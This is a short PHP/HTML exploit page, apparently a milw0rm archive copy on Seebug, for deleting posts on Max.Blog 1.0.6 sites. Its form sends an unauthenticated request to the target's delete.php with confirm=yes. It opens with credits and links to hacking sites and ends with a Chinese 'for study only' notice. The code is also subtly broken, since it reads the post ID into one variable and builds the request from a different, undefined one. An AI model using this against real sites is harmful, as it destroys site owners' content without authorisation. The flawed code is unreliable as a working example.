<html> <head> <title>Max.Blog 1.0.6 Delete Post Exploit</title> </head> <body> <p align="center"> <b>Max.Blog 1.0.6 Delete Post Exploit</b><br /><br /> <b>Discovered by <b>SirGod</b><br /> Thanks to <b>Nytro</b><br /> Please visit : <br /> ------------------------<br /> www.mortal-team.org<br /> ------------------------<br /> www.h4cky0u.org<br /> ------------------------<br /> www.xpl0it.info<br /> ------------------------<br /> www.anti-intruders.org<br /> ------------------------<br /> </b> </p> <?php if(isset($_POST['submit'])) { $site=$_POST['site']; $id=$_POST['post_id']; $pagina=file_get_contents("http://".$site."/delete.php?post=".$post_id."&confirm=yes"); print "<p align=\"center\">Done!</p><br />"; } ?> <form method="POST"> <p align="center"> Site: www. <input type="text" name="site" value="site.com/path" /><br /> (without http,www and trailing slash)<br /> Post ID: <input type="text" name="post_id" value="1" /><br /><br /> <input type="submit" name="submit" value="Delete" /> </p> </form> </body> </html> # milw0rm.com [2009-01-20]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论